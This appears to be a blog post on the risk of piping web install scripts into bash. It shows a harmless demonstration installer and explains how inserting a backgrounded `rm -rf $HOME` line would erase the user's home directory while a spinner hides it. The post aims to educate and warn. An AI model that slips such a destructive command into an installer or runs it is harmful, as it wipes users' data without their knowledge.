Lately I see a lot of projects starting up which advice you to install it with an install script.
For example we take Composer. You can install it with the following command.
curl -sS https://getcomposer.org/installer | php
The idea, great… But… What if you don’t know what the installer script contains?
For example, when DNS spoofing occurs.
This can bring you in a totally different situation…
Lets say we have the following command.
curl -sS https://raw.githubusercontent.com/mariusvw/stuff/master/blog/sh_installer_hack | bash
This will download the installer_hack and inject it directly into bash.
Now if you look at this script you will notice a couple of things… Here is the script
# Fake installer script
# Demonstrate the risk of running scripts from the web.
# This script is harmless but it could do: echo "rm -rf $HOME" | sh &
# Marius van Witzenburg <firstname.lastname@example.org>
# Usage: curl -sS https://raw.githubusercontent.com/mariusvw/stuff/master/blog/sh_installer_hack | bash
echo "Cleaning your harddisk..."
# Insert remove line here
if [ $i = 25 ]; then break; fi
find $HOME -maxdepth 3
echo -e "\nJust kidding, no harm done :)"
This script is harmless, it will simply echo some text, show you a spinner and list some files in your home directory.
Here comes the tricky part that will do harm…
At the line # Insert remove line here… You insert the following code:
echo "rm -rf $HOME" | sh &
Doing that will result that the rm command will be started in the background in another shell.
Then you will see the spinner but meanwhile , your home directory gets erased.
Now you know that these things can happen… It might be smart to read the script that you run before actually running it. Be safe!